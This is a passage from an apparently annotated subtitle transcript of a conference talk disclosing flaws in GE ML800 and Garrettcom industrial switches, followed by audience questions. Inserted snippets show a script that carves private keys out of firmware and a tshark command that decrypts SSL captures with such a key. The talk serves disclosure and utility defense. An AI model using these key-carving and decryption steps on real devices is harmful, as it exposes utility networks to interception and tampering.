every byte to see which parts of the file
295
00:25:54,561 --> 00:26:00,831
don't produce ZLIB errors when you try and
decompress them and you figure out what
296
00:26:00,831 --> 00:26:09,170
sectors of this file are compressed. So
you go to your friend dd and you carve out
297
00:26:09,170 --> 00:26:15,760
this section of the file right. So we have
this larger firmware image with this
298
00:26:15,760 --> 00:26:21,310
little compressed section and we have now
cut this little compressed section out. I
299
00:26:21,310 --> 00:26:24,430
suppose I could have loaded this up into
python and used zlib to decompress it. But
300
00:26:24,430 --> 00:26:27,559
at the time I was still trying to use
command line tools, and someone said, just
301
00:26:27,559 --> 00:26:35,350
concatenate the gzip bytes onto it.
Gzip inherits from inflate and deflate. So
302
00:26:35,350 --> 00:26:39,100
if you just concatenate the bytes it
should still handle it. So I did that and
303
00:26:39,100 --> 00:26:43,920
I got a decompressed binary. When you ran
strings on that it started to make a lot
304
00:26:43,920 --> 00:26:48,750
more sense and you could find the opcodes
in it where previously it didn't make any
305
00:26:48,750 --> 00:26:53,910
sense at all. So once you've got an image
like that, what do you do? Well, if you're
306
00:26:53,910 --> 00:26:58,250
me you just grep for bugs. I think I
learned that from Ilija. If he's here in
307
00:26:58,250 --> 00:27:05,590
the room thank you. Thank you very much. I
asked him like a year or two ago. How do
308
00:27:05,590 --> 00:27:10,761
you find so many bugs? And he
said: "Oh, I just, you know, I grep for
309
00:27:10,761 --> 00:27:16,510
them, I use find." laughs And so I
started thinking about firmware images.
310
00:27:16,510 --> 00:27:19,640
Like if I was going to grep for a bug in a
firmware image what would it be. And my
311
00:27:19,640 --> 00:27:23,840
answer is hardcoded credentials and
default keys because you find them every
312
00:27:23,840 --> 00:27:29,309
single time. So I have this command aliased
on my machine and I just grep for it, and I
313
00:27:29,309 --> 00:27:35,270
find private keys and this is how you too
can end up with a private key collection.
314
00:27:35,270 --> 00:27:40,465
So, there you go.
315
00:27:40,465 --> 00:27:50,240
Applause
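Pulling the steps of that journey together, a rough sketch of the same idea: scan a firmware blob for offsets that zlib will decompress without error, then search the result for PEM private-key markers. The header-byte shortcut, the regular expression and the structure are illustrative assumptions, not the original script:

import re
import sys
import zlib

KEY_RE = re.compile(
    rb"-----BEGIN (?:RSA |DSA |EC )?PRIVATE KEY-----"
    rb".*?-----END (?:RSA |DSA |EC )?PRIVATE KEY-----",
    re.DOTALL,
)

def zlib_regions(blob):
    # Try offsets that look like a zlib header (0x78); the original script
    # reportedly tried every byte, this check just skips most of them cheaply.
    for offset in range(len(blob)):
        if blob[offset] != 0x78:
            continue
        d = zlib.decompressobj()
        try:
            data = d.decompress(blob[offset:])
        except zlib.error:
            continue
        if data:
            yield offset, data

blob = open(sys.argv[1], "rb").read()
for offset, data in zlib_regions(blob):
    for key in KEY_RE.findall(data):
        print("private key in compressed region at offset", hex(offset))
        print(key.decode(errors="replace"))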
316
00:27:50,240 --> 00:27:53,770
Yeah they're hardcoded keys,
but what are they for? It doesn't
317
00:27:53,770 --> 00:27:57,820
stop there. You know you've got the keys,
but what do they do, right? That was the
318
00:27:57,820 --> 00:28:02,500
next step of the journey for me. Two of
them you can see; one is encrypted with a
319
00:28:02,500 --> 00:28:05,740
password; we'll come back to that one
later. Let's start with the one on the
320
00:28:05,740 --> 00:28:15,860
left. If you load this key up into
Wireshark and you use it to decrypt the
321
00:28:15,860 --> 00:28:22,760
SSL, you have a self-decrypting pcap.
Remember at the beginning it was using
322
00:28:22,760 --> 00:28:29,590
HTTPS to manage the device and upload this
firmware image. So if you happen to have
323
00:28:29,590 --> 00:28:37,210
this firmware image you can decrypt all
the traffic. No forward secrecy, right?
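A hedged illustration of that decryption step, assuming a tshark build that still accepts the legacy ssl.keys_list preference (newer releases configure RSA keys through the TLS key table instead). The capture name, address and key file are placeholders, and this only works because the key exchange offers no forward secrecy:

import subprocess

# -r reads the capture, -o sets the (legacy) RSA key list preference, and -V
# prints the full decode, so the cleartext of the management session becomes
# visible once the SSL layer is stripped.
subprocess.run([
    "tshark",
    "-r", "upgrade_session.pcap",
    "-o", "ssl.keys_list:192.0.2.30,443,http,carved_server.key",
    "-V",
], check=True)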
324
00:28:37,210 --> 00:28:41,550
Now you don't have to be lucky and have
concerned citizens send you an email. You
325
00:28:41,550 --> 00:28:46,490
can download this image from the GE website
and you can carve the keys out of the
326
00:28:46,490 --> 00:28:50,100
image in the same way that I did and
decrypt the SSL traffic of any pcap that
327
00:28:50,100 --> 00:29:01,880
is sent to you. Now the passwords
underneath that are in clear text. You can
328
00:29:01,880 --> 00:29:08,040
see them highlighted down here. Password
Manager and user manager. You can see them
329
00:29:08,040 --> 00:29:12,750
up there as well and you can see that
we've decrypted the SSL with that key. So
330
00:29:12,750 --> 00:29:16,559
default keys, right? Is it a big deal? I
believe the vendors in this case say you
331
00:29:16,559 --> 00:29:21,190
can upload your own key to the device. For
those of you who aren't used to working in
332
00:29:21,190 --> 00:29:24,290
embedded it sometimes is difficult to
generate a key on the device because you
333
00:29:24,290 --> 00:29:27,840
don't have enough memory or you don't have
enough entropy or you don't have enough
334
00:29:27,840 --> 00:29:32,270
processing power. Those are the usual
excuses. And they're true. I shouldn't say
335
00:29:32,270 --> 00:29:36,090
excuses; those things are true. But
you could of course generate it on the
336
00:29:36,090 --> 00:29:39,850
client side and upload it to the device
and that's what they allow you to do with
337
00:29:39,850 --> 00:29:44,790
this switch which is great but where is
your encrypted channel in which to upload
338
00:29:44,790 --> 00:29:52,801
this key? laughs So you can use the serial
device and make sure visually that there's no man
339
00:29:52,801 --> 00:29:55,340
in the middle. But if you're doing this
remotely – and I'd like you to keep in
340
00:29:55,340 --> 00:29:59,460
mind that most substations are remote –
if anyone here works in a utility are you
341
00:29:59,460 --> 00:30:03,530
going to drive to every substation, plug
in a serial cable to change the keys on
342
00:30:03,530 --> 00:30:07,850
all these devices? It's the sort of thing
you need to know in advance right? So the
343
00:30:07,850 --> 00:30:12,100
problem with key management, particularly
with SSL in the industrial systems
344
00:30:12,100 --> 00:30:19,049
environment, is that you have to manage
the keys. And these particular keys, well
345
00:30:19,049 --> 00:30:23,670
the certificates are self signed so you
can't revoke them. And besides industrial
346
00:30:23,670 --> 00:30:27,189
systems are never connected to the
Internet. So it wouldn't have made any
347
00:30:27,189 --> 00:30:32,299
difference. So these are the kind of
problems we're dealing with in this space.
348
00:30:32,299 --> 00:30:35,271
And that's why I'm trying to encourage
you. Whether you do crypto or privacy or
349
00:30:35,271 --> 00:30:37,640
whatever spend a little time in the
embedded space, just for a bit: there's
350
00:30:37,640 --> 00:30:46,130
plenty of easy work. OK. So what about the
second key. It requires a password. I
351
00:30:46,130 --> 00:30:50,990
didn't feel like brute forcing it. Maybe
you do. I don't know. I tried all the
352
00:30:50,990 --> 00:30:54,340
strings in the image. A classic technique,
just in case someone had hard-coded the
353
00:30:54,340 --> 00:30:56,580
password. I mean the hard coded
credentials were there but not the hard
354
00:30:56,580 --> 00:31:00,460
coded password. So I guess I gotta start
reversing, and as I previously said I suck
355
00:31:00,460 --> 00:31:06,380
at reversing. That's why I come to CCC, so
I can learn, right? But I did find this
356
00:31:06,380 --> 00:31:11,970
PowerPC ROM image, and I think it's running
eCos and RedBoot, and I haven't even gotten
357
00:31:11,970 --> 00:31:15,330
down to doing hardware stuff: taking it
apart, having a look at it, but I probably
358
00:31:15,330 --> 00:31:19,200
will in the future. So there's the image
I'm slowly starting to learn my way around
359
00:31:19,200 --> 00:31:27,140
and figure out what's going on. So I had a
look at the image and I figured out that
360
00:31:27,140 --> 00:31:32,100
this key is used for SSH, right? Well it
would be the other encrypted thing. But I
361
00:31:32,100 --> 00:31:36,261
couldn't enable SSH on the device. I try
and enable SSH on the device and I'm
362
00:31:36,261 --> 00:31:39,100
logged in as manager, by the way, which is
the highest-level user on this particular
363
00:31:39,100 --> 00:31:43,580
device, and I put in the passwords that
I know and a bunch of other passwords and
364
00:31:43,580 --> 00:31:47,590
they don't work. Like I said, I tried all
the strings in the image. So apparently to
365
00:31:47,590 --> 00:31:51,720
enable ssh, I need a password for
something. Now maybe I'm just
366
00:31:51,720 --> 00:31:55,530
misunderstanding or I'm not so clear on
what's going on but I don't know about
367
00:31:55,530 --> 00:31:59,070
you. I kind of feel like if I buy a device
that's supposed to be used for a safety
368
00:31:59,070 --> 00:32:03,440
critical process I should be allowed to
use SSH without having to call up the
369
00:32:03,440 --> 00:32:11,120
vendor and get some special magic
password. So considering I don't like that
370
00:32:11,120 --> 00:32:17,420
approach: what if I patched my own key
into the image, right? I don't know the
371
00:32:17,420 --> 00:32:22,201
password of their key but I know the
password of a key I can generate. So I
372
00:32:22,201 --> 00:32:27,290
just need to make sure it's roughly the
right size and try and patch it in. Then
373
00:32:27,290 --> 00:32:29,600
I've got some problems with compression
because I've got to reverse the whole
374
00:32:29,600 --> 00:32:33,570
process that I just described to you and patch
it into the larger binary. Will there be
375
00:32:33,570 --> 00:32:44,200
any CRC or firmware signing? I don't know,
right. So the uploaded image is not a
376
00:32:44,200 --> 00:32:50,530
valid image for this device. That's
correct: I messed with it. But I got this
377
00:32:50,530 --> 00:32:54,440
error and it gave me a clue. It gave me a
clue that I did indeed have some of my
378
00:32:54,440 --> 00:33:02,410
CRCs wrong so when I altered the image
again I got to this state. So you're
379
00:33:02,410 --> 00:33:05,510
learning all the time by having a real
device. Now some of my friends they do
380
00:33:05,510 --> 00:33:10,051
static analysis and they don't buy these
devices. I decided to buy this one. I
381
00:33:10,051 --> 00:33:15,750
found one on eBay. It wasn't very
expensive. I mean it depends on your range
382
00:33:15,750 --> 00:33:20,179
for expensive. But if you're helping
defend industrial systems I thought it was
383
00:33:20,179 --> 00:33:26,880
worth the money. So I bought it and this
enables me to try firmware images out and
384
00:33:26,880 --> 00:33:31,210
I can slowly start to figure out what I
need to patch on these firmware images to
385
00:33:31,210 --> 00:33:37,321
do whatever I want. Luckily I just tried
to patch mine to have SSH because I
386
00:33:37,321 --> 00:33:43,799
thought people deserve to have SSH. So
that's an Adler-32 up there on the left
387
00:33:43,799 --> 00:33:50,270
and the other CRC is on the bottom. So that
Adler-32 and some adjustment of file
388
00:33:50,270 --> 00:33:54,420
length (all those zeros in that line just
above it) eventually got me to the point
389
00:33:54,420 --> 00:33:59,570
where it believes it's a corrupted binary.
And then we have this CRC on the end that
390
00:33:59,570 --> 00:34:08,210
we need to have a look at. Now I'm a big
fan of suspense. I love suspense. I'm
391
00:34:08,210 --> 00:34:14,849
going to leave that one as a cliffhanger
and an exercise for you watching. So I
392
00:34:14,849 --> 00:34:18,099
said I was going to talk about GE ML800
but I'm also going to talk about
393
00:34:18,099 --> 00:34:21,219
Garrettcom. Luckily it's not very
difficult. Garrettcom is the original
394
00:34:21,219 --> 00:34:27,480
equipment manufacturer for the GE ML800
series. I noticed that because the
395
00:34:27,480 --> 00:34:31,299
certificate I found attached to those
private keys said Garrettcom in it and I
396
00:34:31,299 --> 00:34:35,789
went and looked at their firmware images
and they have similar CRCs, similar file
397
00:34:35,789 --> 00:34:39,710
structures, similar everything. So I believe
that they are affected by the cross site
398
00:34:39,710 --> 00:34:45,929
scripting, the denial of service, and
hardcoded keys. I understand from some
399
00:34:45,929 --> 00:34:50,530
people that they have been in contact with
GE to try and fix some of this stuff but
400
00:34:50,530 --> 00:34:57,960
the response from GE was mainly "Sorry,
this is the end of life on this device".
401
00:34:57,960 --> 00:35:02,890
That's fine. I understand you're running a
business but you're selling equipment to
402
00:35:02,890 --> 00:35:08,339
people who manage utilities that we all
depend on. If Sony goes bankrupt because
403
00:35:08,339 --> 00:35:13,799
they get hacked that's one thing right.
But you can't just dissolve a utility and
404
00:35:13,799 --> 00:35:18,670
start again. As my friend Klaus points out
regularly – fantastic insights into the
405
00:35:18,670 --> 00:35:23,150
industrial system world, Klaus and Vanessa
– you can't just dissolve the utility and
406
00:35:23,150 --> 00:35:25,970
start again. You still have the same
infrastructure you still have the same
407
00:35:25,970 --> 00:35:31,249
workers. It doesn't work that way. You
can't bail out utilities that we depend
408
00:35:31,249 --> 00:35:38,329
on. So sorry. End of Life... I don't even
understand why people buy these devices
409
00:35:38,329 --> 00:35:43,130
and this code without code escrow. When
you buy the code make sure you have the
410
00:35:43,130 --> 00:35:48,700
code in perpetuity for these systems so
that you can fix them when something like
411
00:35:48,700 --> 00:35:53,860
this or something worse happens. If I'm
your worst nightmare, you have real
412
00:35:53,860 --> 00:35:59,190
problems because there are very dark
people in the world actually damaging
413
00:35:59,190 --> 00:36:05,460
furnaces in Germany. So me disclosing keys
on stage is scary for you. You need to get
414
00:36:05,460 --> 00:36:12,689
a grip. So, Garrettcom?
Here's your key too.
415
00:36:12,689 --> 00:36:20,104
Applause
416
00:36:20,104 --> 00:36:25,629
The strings come from the images.
Developers are funny people really. I like
417
00:36:25,629 --> 00:36:32,110
this. I just put them up because they're
funny. Some people had some hard times, I
418
00:36:32,110 --> 00:36:36,490
guess, writing some of this code. And my
respect to them! They do great work but
419
00:36:36,490 --> 00:36:43,159
you know, there's a couple of things we
can improve on security in these devices.
420
00:36:43,159 --> 00:36:47,840
So I once had the opportunity to stand in
front of six different vendors at the same
421
00:36:47,840 --> 00:36:53,440
time, their computer emergency response
teams, at a conference, and I said to them:
422
00:36:53,440 --> 00:36:59,659
"Will any of you commit to an average
patch time for vulnerabilities of three
423
00:36:59,659 --> 00:37:05,350
months?" An average patch time, because it
might take 8 months, as it so far has
424
00:37:05,350 --> 00:37:10,130
taken in the case of GE and Garrettcom, to
work on these issues. It might take a long
425
00:37:10,130 --> 00:37:15,050
time in some cases but as an average patch
time I think 3 months for things that we
426
00:37:15,050 --> 00:37:20,440
all depend on is reasonable. So I asked
these six different teams in the same
427
00:37:20,440 --> 00:37:29,410
room. If any of them would commit to this
and I heard silence for 30 seconds. So my
428
00:37:29,410 --> 00:37:35,220
friend decided to call this the silence of
the vendors right. And I think that's that
429
00:37:35,220 --> 00:37:42,029
sums it up. I'd like to see better patch
times. I'd like to see a computer
430
00:37:42,029 --> 00:37:45,200
emergency response teams in each of these
vendors and I'd like to see someone
431
00:37:45,200 --> 00:37:53,600
responsible for security in each of these
different utilities. I can dream, right? I
432
00:37:53,600 --> 00:37:57,369
think that key management... the current
practice industrial systems is to take
433
00:37:57,369 --> 00:38:02,679
some insecure protocol and wrap it in SSL
or TLS which is why we need the help of
434
00:38:02,679 --> 00:38:10,180
you privacy people because TLS and SSL
are not the be all and end all. They often
435
00:38:10,180 --> 00:38:16,430
sort of go the wrong way, right. For
example you can use TLS to do integrity
436
00:38:16,430 --> 00:38:20,679
without encryption so you can verify that
every message has reached its destination
437
00:38:20,679 --> 00:38:25,920
intact but it is not encrypted. And this
means that you can still do intrusion
438
00:38:25,920 --> 00:38:32,530
detection analysis of the packets. That's
really good. But nobody uses that in SSL
439
00:38:32,530 --> 00:38:36,669
in other ways right. I'm a big fan of
Shodan and use Shodan for a variety of
440
00:38:36,669 --> 00:38:41,450
different things usually to get a sense of
the Internet as a whole, right? Let me
441
00:38:41,450 --> 00:38:44,729
back up a little bit. When I was at
Cambridge I went to Darwin college and
442
00:38:44,729 --> 00:38:47,690
because you're at Darwin college you read
up a bit on Darwin and you think about how
443
00:38:47,690 --> 00:38:51,870
Darwin thought and I think the Internet is
kind of like that. When it was built by
444
00:38:51,870 --> 00:38:56,870
the IETF and various people, who did
fantastic work, they imagined it one way
445
00:38:56,870 --> 00:39:01,450
and then we inherited it and it grew and
it became an ecosystem and stuff happens
446
00:39:01,450 --> 00:39:05,429
out there that you wouldn't expect. And so
that's why I like Shodan. It's kind of
447
00:39:05,429 --> 00:39:09,869
like being a natural scientist: what's a
survey of the world, what kind of machines
448
00:39:09,869 --> 00:39:13,429
are out there, what versions are they
running, when do people update their SSL..
449
00:39:13,429 --> 00:39:17,559
err, you know, their certificates. Do they
do it before or after the certificate is
450
00:39:17,559 --> 00:39:22,600
invalid. Do they always upgrade the
algorithm. Do they increase the key size.
451
00:39:22,600 --> 00:39:26,380
You know, how do things change, right? You
need to sort of study it as a whole, and
452
00:39:26,380 --> 00:39:30,440
that's my point when it comes to just
taking SSL and slapping it over a
453
00:39:30,440 --> 00:39:37,759
protocol. It's not quite that simple. So
again we need your help. Where can we go
454
00:39:37,759 --> 00:39:42,289
with these attacks. And you remember at
the beginning I pointed out the underpants
455
00:39:42,289 --> 00:39:49,770
gnome. The emperor wears no clothes.
Altering switch configurations is a big
456
00:39:49,770 --> 00:39:57,410
deal because you can exfiltrate process
data. That gives you a map of the process
457
00:39:57,410 --> 00:40:02,500
because industrial systems are bespoke.
Each one of them is different. It does run
458
00:40:02,500 --> 00:40:06,539
different traffic and we are lucky to work
on security in this space because our
459
00:40:06,539 --> 00:40:10,880
users are numerate and literate and they
care about safety. They don't always
460
00:40:10,880 --> 00:40:14,239
understand security but they do care about
safety. So if you can make it a safety
461
00:40:14,239 --> 00:40:18,229
concern they care. There are also
engineers at many of these utilities who
462
00:40:18,229 --> 00:40:24,219
look at the network 24/7. Not all of them
but some of them. Can you imagine a home
463
00:40:24,219 --> 00:40:28,899
network or something else with that kind
of user base? We're lucky; we should be
464
00:40:28,899 --> 00:40:35,030
taking advantage of that user base. So
getting back to the point you know denial
465
00:40:35,030 --> 00:40:38,979
of service attacks to disrupt the process
go and see Marmusha's talk. This will all
466
00:40:38,979 --> 00:40:43,039
make a lot more sense when you go and see
her talk. Basically any man in the middle
467
00:40:43,039 --> 00:40:47,990
attack can disrupt alter or drop traffic
at this point. If you can affect the
468
00:40:47,990 --> 00:40:51,740
switches in the substation. And
exfiltrating the data gives you a map
469
00:40:51,740 --> 00:40:58,109
of the process which leads towards further
potential damage for the utilities. Now
470
00:40:58,109 --> 00:41:01,410
it's not always that simple people will
get up on stage and they will tell you I
471
00:41:01,410 --> 00:41:07,309
am awesome and this is how it's done and
it's easy to blow shit up. It's not true.
472
00:41:07,309 --> 00:41:10,249
It takes a little bit of thought it takes
a little bit of work. I am certainly not
473
00:41:10,249 --> 00:41:15,560
awesome. I am just a quality assurance
person from a former vendor. I just
474
00:41:15,560 --> 00:41:22,509
decided to get into security and keep
going with it. So you can't always perform
475
00:41:22,509 --> 00:41:25,389
these man in the middle attacks. People
will say you can. But the reason you can't
476
00:41:25,389 --> 00:41:30,800
is real-time system constraints. Some
systems will stop receiving traffic five
477
00:41:30,800 --> 00:41:34,539
milliseconds or microseconds later and
ignore anything. If a value doesn't arrive
478
00:41:34,539 --> 00:41:39,209
in this time it doesn't care. So the idea
that you can route the traffic out to some
479
00:41:39,209 --> 00:41:43,590
other country and then back in and disrupt
the process is bollocks. Sometimes you
480
00:41:43,590 --> 00:41:48,029
have to alter the firmware to achieve
that. That depends on the process but I'm
481
00:41:48,029 --> 00:41:52,830
just trying to give you a sense of how
performing actual attacks gives you a sense
482
00:41:52,830 --> 00:41:56,120
of what the limits are, what the
logistical burdens are for the attacker
483
00:41:56,120 --> 00:42:04,940
and that's important stuff for us to know.
All right. Little bit of an overview.
484
00:42:04,940 --> 00:42:11,810
Drunk session IDs. brute forcing
MD5+NONCE, cross site request forgery for
485
00:42:11,810 --> 00:42:17,419
firmware upload (of all things),
reflected cross-site scripting (8 cases of
486
00:42:17,419 --> 00:42:23,050
it), pre-authentication denial of service,
hardcoded keys times 2 in a firmware
487
00:42:23,050 --> 00:42:28,730
image, SSL without forward secrecy, self
signed certificates so there's no revoking
488
00:42:28,730 --> 00:42:32,280
there's no managing of the keys on these
devices right. Not to mention utility
489
00:42:32,280 --> 00:42:35,989
workers are busy already. They may not
have time to manage all of these devices
490
00:42:35,989 --> 00:42:40,250
we might need to rethink that approach
right. Clear text passwords under SSL
491
00:42:40,250 --> 00:42:44,049
because well no one can break SSL unless
you hard code the key in the firmware
492
00:42:44,049 --> 00:42:49,539
that's downloadable from the internet.
Enable ssh with a password and three
493
00:42:49,539 --> 00:42:55,289
quarters of a year waiting for fixes for
some of this stuff. I'm not happy with
494
00:42:55,289 --> 00:43:00,699
that. I think that we could live in a much
better, much safer world. And to do so we
495
00:43:00,699 --> 00:43:07,909
need to talk very seriously about some of
these issues. Don't take my opinion for
496
00:43:07,909 --> 00:43:11,700
it. Listen to some other people. The best
thing about doing industrial systems work
497
00:43:11,700 --> 00:43:15,480
is the diversity of approach. You know I
love that there are so many other people
498
00:43:15,480 --> 00:43:20,080
doing SCADA and ICS. And I love that
they're going different directions. So in
499
00:43:20,080 --> 00:43:26,030
the future I plan to be on another stage
with some friends and show you some more.
500
00:43:26,030 --> 00:43:30,449
Thank you for listening mustache fans and
as a parting thought. More tax money is
501
00:43:30,449 --> 00:43:35,349
spent on surveillance than on
defending common utilities.
502
00:43:35,349 --> 00:43:44,394
applause
503
00:43:44,394 --> 00:43:51,160
Herald: Thank you. That made for a scary
Sunday morning. They've got a utility *a
504
00:43:51,160 --> 00:43:58,119
guess, mostly incomprehensible* down the
road. OK. We'll have some questions taken
505
00:43:58,119 --> 00:44:06,459
please. As the session is recorded and
streamed anything you say, say it into a
506
00:44:06,459 --> 00:44:17,049
mic. Any questions up? Wow, it is Sunday
morning.
507
00:44:17,049 --> 00:44:18,029
Éireann: Number three, sure
508
00:44:18,029 --> 00:44:21,280
Herald: everybody understood everything?
You're kidding me.
509
00:44:21,280 --> 00:44:23,569
Éireann: I've got one right here
Herald: here is a question.
510
00:44:23,569 --> 00:44:30,089
Question: Hey thanks I enjoyed your talk
and I think it's very important to raise
511
00:44:30,089 --> 00:44:37,660
awareness. But I think it's not so much to
raise awareness in this community, but
512
00:44:37,660 --> 00:44:43,880
within the engineering community, and I see
it a lot of the time: many engineers
513
00:44:43,880 --> 00:44:49,730
have lots of problems doing that for
several reasons. There is maybe the
514
00:44:49,730 --> 00:44:55,239
engineer who is thinking about this, but
who *incomprehensible* has to deal
515
00:44:55,239 --> 00:45:03,069
with service personnel who know how to
work a hammer and a screwdriver, and on the
516
00:45:03,069 --> 00:45:11,450
other side engineers have to work with
customers, who are more like those lazy people.
517
00:45:11,450 --> 00:45:16,309
And so that's how these things happen. And
I think it's more important to raise
518
00:45:16,309 --> 00:45:22,000
awareness of these kinds of things in the
engineering community.
519
00:45:22,000 --> 00:45:24,730
Éireann: So just to repeat a little bit
for anybody else that couldn't hear it or
520
00:45:24,730 --> 00:45:29,170
for the recording it's very important to
work with the engineers some of the
521
00:45:29,170 --> 00:45:32,469
engineers understand the problem. But
typically management or lower level
522
00:45:32,469 --> 00:45:37,680
service personnel don't always understand
the problem. And it's not important to
523
00:45:37,680 --> 00:45:41,690
raise the awareness in the hacker
community. But more with the engineers is
524
00:45:41,690 --> 00:45:46,299
what you were saying. Right. OK.
Absolutely true. Completely agree with
525
00:45:46,299 --> 00:45:50,920
you. I don't just come to these
conferences and present to you guys. I go
526
00:45:50,920 --> 00:45:54,430
and I present to the engineers too. And in
fact a couple of engineers have come to
527
00:45:54,430 --> 00:45:58,599
this conference because we did work at
other conferences to see what the hacker
528
00:45:58,599 --> 00:46:01,741
community is about and learn things from
the hacker community because this is a
529
00:46:01,741 --> 00:46:05,360
place where you can learn if you're just
not afraid of getting pwned a couple of
530
00:46:05,360 --> 00:46:10,999
times right. And it happens to me too
right. I learned a lot from getting
531
00:46:10,999 --> 00:46:14,249
compromised on my machine and watching
someone do something. Anyways back to the
532
00:46:14,249 --> 00:46:18,380
point I don't just work with engineers or
hackers. I also work with C-level
533
00:46:18,380 --> 00:46:21,920
executives. So I'm on a sabbatical from
IOActive at the moment, at the Cambridge
534
00:46:21,920 --> 00:46:26,469
Centre for Risk Studies, and I'm working
with the insurance people which has its
535
00:46:26,469 --> 00:46:31,441
challenges shall we say. But some of them
are very intelligent people and they want
536
00:46:31,441 --> 00:46:34,670
to understand what's going on with hacking
attacks and they want to approach this
537
00:46:34,670 --> 00:46:40,839
from a slightly different angle. My stake
in that is to be sure that when the
538
00:46:40,839 --> 00:46:45,479
insurance people do get involved, they
actually ask for fixes and improve stuff.
539
00:46:45,479 --> 00:46:49,809
So yes I do my best to raise awareness
wherever I can. And I'm not alone. You can
540
00:46:49,809 --> 00:46:53,769
help me.
Questioner: Thank you
541
00:46:53,769 --> 00:46:58,019
applause
542
00:46:58,019 --> 00:47:05,570
Herald: OK, there's another question here.
Number two. Oh, and up there too, yes we
543
00:47:05,570 --> 00:47:09,380
saw you. OK number two was first I think.
Go ahead
544
00:47:09,380 --> 00:47:13,570
Question: *incomprehensible* So you
mentioned a couple of things, er, a couple
545
00:47:13,570 --> 00:47:18,440
of vulnerabilities and I was wondering
what you would think an ideal system would
546
00:47:18,440 --> 00:47:24,150
look like. You mentioned key provisioning
of course putting certificates. I assume
547
00:47:24,150 --> 00:47:28,470
that they were different certificates for
different devices rather than the same
548
00:47:28,470 --> 00:47:37,430
certificate for all devices. Okay that's a bad
thing. And also sort of the way how
549
00:47:37,430 --> 00:47:44,839
the software update management works. So
how would you if you could give them some
550
00:47:44,839 --> 00:47:48,950
advice how to design a system
how would you do it?
551
00:47:48,950 --> 00:47:55,420
Éireann: Okay. So first of all I wouldn't
hard code the keys, as you discussed,
552
00:47:55,420 --> 00:48:01,859
to be in every device the same. It's one
thing to put in your documentation hey you
553
00:48:01,859 --> 00:48:07,630
should update the keys but I mean if I can
patch a binary file with a key then there's
554
00:48:07,630 --> 00:48:11,089
no reason you couldn't do that on the
website where you download the firmware
555
00:48:11,089 --> 00:48:15,160
image, right. Just as an example, a
thought experiment that sort of makes that
556
00:48:15,160 --> 00:48:18,420
clear. The upgrade path for these devices
is download the firmware image from the
557
00:48:18,420 --> 00:48:25,280
website to some machine and then carry it,
because all these systems are airgapped,
558
00:48:25,280 --> 00:48:29,229
to some other location and then upload it
onto the switch right with hardcoded
559
00:48:29,229 --> 00:48:33,869
credentials. So first off whenever you
provision a switch initially you provision
560
00:48:33,869 --> 00:48:36,920
all of the credentials for that device.
That's standard practice on many routers
561
00:48:36,920 --> 00:48:41,900
and other pieces of equipment today. And I
would think less about defending and
562
00:48:41,900 --> 00:48:46,230
securing the device than on being
able to regularly check its integrity,
563
00:48:46,230 --> 00:48:48,539
the integrity of the firmware that is
running and the integrity of the
564
00:48:48,539 --> 00:48:54,289
configuration. So I'd focus on that and I'd
focus on being able to recover the switch
565
00:48:54,289 --> 00:48:57,740
after it's been attacked. So you reverse
your thinking. You assume that one day
566
00:48:57,740 --> 00:49:01,309
someone is going to crack your firmware
signing and crack this and crack that and
567
00:49:01,309 --> 00:49:05,930
you focus on how can I quickly upload a
new firmware image that is known to be
568
00:49:05,930 --> 00:49:12,250
good and verify that the one that is
uploaded is good to this device.
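A minimal sketch of that "check integrity regularly" idea, assuming you can export the firmware image and configuration out of band (the file names and baseline location are placeholders): hash each artifact and compare it against a recorded known-good value.

```python
import hashlib
import json
from pathlib import Path

BASELINE = Path("baseline_hashes.json")  # placeholder known-good record

def sha256_of(path: Path) -> str:
    """Stream the file through SHA-256 so large images stay memory-friendly."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def check(artifacts: list[Path]) -> None:
    baseline = json.loads(BASELINE.read_text()) if BASELINE.exists() else {}
    for path in artifacts:
        if not path.exists():
            print(f"{path.name}: not exported yet, skipping")
            continue
        current = sha256_of(path)
        known = baseline.get(path.name)
        if known is None:
            baseline[path.name] = current
            print(f"{path.name}: no baseline yet, recording {current[:16]}...")
        elif known != current:
            print(f"{path.name}: MISMATCH - investigate, re-flash a known-good image")
        else:
            print(f"{path.name}: matches baseline")
    BASELINE.write_text(json.dumps(baseline, indent=2))

# Placeholder exports pulled from the switch over its management interface.
check([Path("exported_firmware.bin"), Path("exported_config.txt")])
```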
569
00:49:12,250 --> 00:49:16,059
Questioner: Thank you.
Herald: There was a question up there on
570
00:49:16,059 --> 00:49:18,769
the balcony.
Signal angel: Yes we have two questions
571
00:49:18,769 --> 00:49:25,549
here on the net. So the first one is how
would you solve the end-of-life issue?
572
00:49:25,549 --> 00:49:29,900
Sometimes *incomprehensible* clients just
get really outdated.
573
00:49:29,900 --> 00:49:33,420
Éireann: That's absolutely true and it is
slightly unfair of me to be so hard on the
574
00:49:33,420 --> 00:49:38,349
vendors. But it's my job to take the
debate a little bit too far the other way.
575
00:49:38,349 --> 00:49:43,229
So how would I solve the end of life issue
is the question from the internet. I don't
576
00:49:43,229 --> 00:49:47,759
know. I think that's not a technical
problem, it's a societal problem. Like when
577
00:49:47,759 --> 00:49:55,970
we buy bridges they are bridges until they
fall down. When we buy roads they stay
578
00:49:55,970 --> 00:49:59,130
there until they go away. I mean there are
probably some end-of-life issues in there
579
00:49:59,130 --> 00:50:04,960
but it's almost more of a contractual
legal issue and someone should study that.
580
00:50:04,960 --> 00:50:08,339
There are people studying that but it's
not my area of expertise but I'll try and
581
00:50:08,339 --> 00:50:12,969
answer as best I can. I think code escrow
is a good way to go. When you buy some of
582
00:50:12,969 --> 00:50:18,079
these devices, you say: I want the code for
this device in the future. I want to have
583
00:50:18,079 --> 00:50:22,369
access to it. If your company goes
bankrupt I need you to give up the source
584
00:50:22,369 --> 00:50:26,329
code for these devices when you go
bankrupt or when you disappear or when
585
00:50:26,329 --> 00:50:30,380
it's the end of life. There are a couple
of manufacturers out there doing open
586
00:50:30,380 --> 00:50:35,200
source switches. There's a company called
Opengear who are awesome. They gave me a
587
00:50:35,200 --> 00:50:39,790
switch to play with that I haven't had
time to look at yet. I think that's amazing
588
00:50:39,790 --> 00:50:42,700
right. And their code is open source and
you can go and examine it. So you would
589
00:50:42,700 --> 00:50:46,309
have the code anyway. Those are two
different approaches. I think there are
590
00:50:46,309 --> 00:50:49,979
others. You can solve this problem
technically or legally or socially, but as
591
00:50:49,979 --> 00:50:55,869
a society we depend on these utilities and
that code should not just vanish when it's
592
00:50:55,869 --> 00:51:05,369
difficult or costly to keep it upgraded.
applause
593
